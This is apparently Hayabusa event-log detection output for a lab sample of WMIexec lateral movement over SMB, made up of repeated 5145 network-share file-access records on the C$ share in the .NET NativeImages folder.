0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.953 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.953 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.984 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:31.984 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.984 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.984 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.984 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.984 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.000 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.000 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.000 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.000 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.015 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.015 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.015 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.015 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.015 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:32.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.050 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.050 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.050 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.050 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.050 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.050 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 | IP Addr: 10.23.23.9 | LID: 